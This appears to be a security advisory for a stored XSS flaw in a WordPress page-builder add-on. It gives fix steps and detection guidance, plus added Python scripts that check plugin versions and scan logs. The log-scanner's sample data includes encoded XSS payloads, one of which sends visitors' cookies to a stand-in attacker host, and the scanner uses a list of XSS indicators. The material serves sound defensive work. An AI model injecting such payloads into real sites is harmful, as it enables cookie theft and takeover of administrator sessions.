CVE-2024-9867
📋 TL;DR
This is a stored cross-site scripting (XSS) vulnerability in the Element Pack Elementor Addons WordPress plugin. Authenticated users with Contributor-level access or higher can submit script through the plugin's marker_content parameter; the value is stored and later rendered without adequate sanitization or escaping, so the script executes in the browser of anyone who views the affected page, including editors and administrators reviewing the content.
💻 Affected Systems
- Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) WordPress plugin, all versions up to and including 5.10.2
📦 What is this software?
Element Pack by Bdthemes is a widget and template add-on for the Elementor page builder. The free version is distributed through the WordPress.org plugin repository under the slug bdthemes-element-pack-lite.
⚠️ Risk & Real-World Impact
Worst Case
Because the injected script runs in the victim's browser session, an attacker can perform actions as that user. If an Administrator views the compromised page, the script can create a new administrator account, modify site settings, or upload a backdoored plugin or theme, leading to full site compromise. Other visitors can be redirected to malicious sites, served defaced content, or have form data and non-HttpOnly cookies stolen. (WordPress sets its authentication cookies as HttpOnly, so forging requests from the victim's session is more realistic than reading the session cookie directly.)
Likely Case
Attackers with Contributor access inject a script into a page element; the payload is stored and rendered for every visitor, stealing visitor data or redirecting them to phishing pages. Since Contributor-authored content normally waits for an Editor or Administrator to review it, the reviewer's privileged browser session is usually the first victim.
If Mitigated
Validating the value on input and escaping it on output (with WordPress's escaping helpers such as esc_html() or wp_kses() for the allowed subset of HTML) would prevent the injection. Least-privilege account management, in particular not handing out Contributor accounts to untrusted users and not using Contributor as the default registration role, reduces the pool of users who can reach the vulnerable code at all.
🎯 Exploit Status
Exploitation requires an authenticated Contributor-level (or higher) account but is otherwise simple: the payload is ordinary HTML and JavaScript submitted through the normal Elementor editing workflow, so no special tooling is needed. Sites that allow open registration with Contributor as the default role, or that accept guest authors, are exposed to anyone who can create an account.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 5.10.3 or later
Vendor Advisory: https://plugins.trac.wordpress.org/changeset/3180563/
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins > Installed Plugins.
3. Find 'Element Pack Elementor Addons'.
4. Click 'Update Now' if an update is available.
5. Alternatively, download version 5.10.3 or later from the WordPress plugin repository and update manually.
🔧 Temporary Workarounds
Temporary Plugin Deactivation
Disable the vulnerable plugin until patched. Note that this removes every Element Pack widget from the front end of the site, not just the affected one.
wp plugin deactivate bdthemes-element-pack-lite
Restrict User Roles
Temporarily demote Contributor-level users you do not trust to Subscriber. The command below demotes every Contributor; review the list first if some should keep their role. wp user set-role takes the user and then the role, so each ID has to be passed individually:
wp user list --role=contributor --field=ID | xargs -I{} wp user set-role {} subscriber
This only blocks new injections. Any payload a Contributor has already stored remains in the page until it is removed.
🧯 If You Can't Patch
- Implement a strict Content Security Policy (CSP) header that does not allow 'unsafe-inline' for script-src; a policy that permits inline scripts does nothing against this class of XSS
- Deploy web application firewall (WAF) rules to block XSS payloads in the marker_content parameter, matching on the URL-decoded value case-insensitively, since literal "<script>" rules are trivially bypassed with encoding or alternative vectors such as event handlers
- Audit existing pages for injected content, because the XSS is stored: blocking new requests does not remove payloads that were saved before the rule was in place
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin panel > Plugins > Element Pack Elementor Addons > Version. If the version is 5.10.2 or lower, the site is vulnerable. Inactive installs count too: the plugin becomes exploitable again as soon as it is reactivated.
Check Version:
wp plugin get bdthemes-element-pack-lite --field=version
Verify Fix Applied:
Verify the plugin version is 5.10.3 or higher in the WordPress admin panel (or with the wp plugin get command above). Patching stops new injections but does not clean up payloads already stored by a Contributor; review content created or edited by Contributor accounts while the vulnerable version was installed and remove anything suspicious.
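The version check above, as an added example for checking a fleet of sites rather than one admin panel. This is not code from the advisory or the plugin; it consumes the JSON that the real wp-cli command `wp plugin list --format=json` prints (fields name, status, update, version). The three site entries are constructed sample output, not real sites, and the plugin slug and fixed version come from this advisory.

```python
import json

# Plugin slug and first fixed version, as stated in the advisory.
VULNERABLE_SLUG = "bdthemes-element-pack-lite"
FIXED_VERSION = "5.10.3"


def parse_version(version):
    """Turn '5.10.2' into (5, 10, 2) so versions compare numerically.

    String comparison would rank '5.9.0' above '5.10.3'. Any non-numeric
    suffix on a component (e.g. '3-beta') is ignored.
    """
    parts = []
    for piece in version.strip().split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def is_vulnerable(version):
    """True when the installed version is below the first fixed release."""
    return parse_version(version) < parse_version(FIXED_VERSION)


def find_vulnerable_installs(plugin_lists):
    """plugin_lists maps a site label to the text of `wp plugin list --format=json`
    collected on that site. Returns (site, version, status) for every vulnerable
    Element Pack install, active or inactive: an inactive plugin is still a risk
    the moment someone reactivates it."""
    findings = []
    for site, raw_json in plugin_lists.items():
        for plugin in json.loads(raw_json):
            if plugin.get("name") != VULNERABLE_SLUG:
                continue
            version = plugin.get("version", "0")
            if is_vulnerable(version):
                findings.append((site, version, plugin.get("status", "unknown")))
    return findings


# Constructed sample output of `wp plugin list --format=json` from three
# hypothetical sites; the site names and version numbers are made up.
SAMPLE_PLUGIN_LISTS = {
    "blog.example": (
        '[{"name":"bdthemes-element-pack-lite","status":"active","update":"available","version":"5.10.2"},'
        '{"name":"elementor","status":"active","update":"none","version":"3.24.0"}]'
    ),
    "shop.example": '[{"name":"bdthemes-element-pack-lite","status":"inactive","update":"none","version":"5.9.0"}]',
    "docs.example": '[{"name":"bdthemes-element-pack-lite","status":"active","update":"none","version":"5.10.3"}]',
}


if __name__ == "__main__":
    for site, version, status in find_vulnerable_installs(SAMPLE_PLUGIN_LISTS):
        print(f"{site}: {VULNERABLE_SLUG} {version} ({status}) is vulnerable, update to {FIXED_VERSION} or later")
```

To use it against real sites, replace SAMPLE_PLUGIN_LISTS with the output of `wp plugin list --format=json` gathered from each WordPress install (for example over SSH); the check deliberately reports inactive copies as well, since deactivation is only a temporary workaround.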
📡 Detection & Monitoring
Log Indicators:
- POST requests to admin-ajax.php whose marker_content parameter contains script tags, event handlers (onerror=, onload=) or javascript: URLs; match on the URL-decoded (and, where Elementor wraps widget settings in JSON, JSON-decoded) value, case-insensitively, because the raw request will typically carry %3Cscript%3E rather than a literal <script>
- Multiple failed login attempts followed by a successful Contributor-level login, particularly from an account that then edits Elementor content
Network Indicators:
- HTTP requests containing <script> tags or their encoded equivalents in the marker_content parameter
- Unexpected outbound connections from visitors' browsers (or the WordPress server) to external domains after loading a page, which is how exfiltrated data typically leaves the site
SIEM Query:
source="wordpress.log" AND ("marker_content" AND ("<script" OR "javascript:" OR "onerror=" OR "onload="))
The literal strings above only catch unencoded payloads; apply the query to a decoded field, or add the percent-encoded forms (%3Cscript, %3C%2Fscript%3E) to the match list.
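The indicators above as runnable detection logic over a handful of log lines. This is an added example, not part of the original advisory and not code from the plugin or its vendor. The log format it parses (timestamp, client IP, WordPress user, method, path, URL-encoded parameters) is an assumed one chosen for illustration, and the five lines are constructed; real application or WAF logs will differ, and Elementor may wrap widget settings in JSON, so adapt the parser to the field your logs actually carry. The point it shows is that the match must run on the decoded value, which the SIEM query's literal strings do not do.

```python
import re
from urllib.parse import parse_qs, unquote

# Indicators from the advisory's SIEM query plus onload=; compared against the
# lower-cased, URL-decoded parameter value so %3CSCRIPT%3E is not missed.
XSS_INDICATORS = ("<script", "javascript:", "onerror=", "onload=")

# Assumed log layout: ts ip user method path [params]. Constructed for this example.
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<user>\S+) (?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<params>\S+))?$"
)


def decode_params(raw):
    """URL-decode a form/query string into {name: [values]}.

    parse_qs decodes once; unquote runs a second pass so doubly-encoded
    payloads (%253Cscript%253E) are caught too. The second pass uses unquote,
    not unquote_plus, so a literal '+' produced by the first pass survives.
    """
    return {
        name: [unquote(v) for v in values]
        for name, values in parse_qs(raw, keep_blank_values=True).items()
    }


def find_xss_in_line(line):
    """Return (user, ip, indicator, decoded_value) when the line carries a
    marker_content value with an XSS indicator, otherwise None."""
    m = LOG_LINE.match(line)
    if not m or not m.group("params"):
        return None
    for value in decode_params(m.group("params")).get("marker_content", []):
        lowered = value.lower()
        for indicator in XSS_INDICATORS:
            if indicator in lowered:
                return (m.group("user"), m.group("ip"), indicator, value)
    return None


def scan(lines):
    """Run the check over every line and return only the hits."""
    return [hit for hit in (find_xss_in_line(line) for line in lines) if hit]


# Constructed sample log: one benign marker, three injection attempts from a
# single Contributor account (plain, upper-case event handler, double-encoded),
# and an unrelated login request. IPs are documentation ranges.
SAMPLE_LOG = [
    "2024-10-15T14:01:03Z 198.51.100.7 editor02 POST /wp-admin/admin-ajax.php marker_content=Main+office&lat=51.5",
    "2024-10-15T14:02:11Z 203.0.113.5 contrib01 POST /wp-admin/admin-ajax.php "
    "marker_content=%3Cscript%3Efetch%28%27https%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%29%3C%2Fscript%3E",
    "2024-10-15T14:02:40Z 203.0.113.5 contrib01 POST /wp-admin/admin-ajax.php "
    "marker_content=%3CIMG+SRC%3Dx+ONERROR%3Dalert%281%29%3E",
    "2024-10-15T14:03:02Z 203.0.113.5 contrib01 POST /wp-admin/admin-ajax.php "
    "marker_content=%253Cscript%253Ealert%281%29%253C%252Fscript%253E",
    "2024-10-15T14:05:00Z 192.0.2.9 - GET /wp-login.php",
]


if __name__ == "__main__":
    for user, ip, indicator, value in scan(SAMPLE_LOG):
        print(f"{user}@{ip} sent marker_content matching {indicator!r}: {value}")
```

Three of the five lines are flagged, all from the same Contributor account, which is the pattern worth alerting on: one user writing several marker values containing script or event handlers in a short window. The upper-case ONERROR and the double-encoded <script> are both caught only because the comparison happens after decoding and lower-casing.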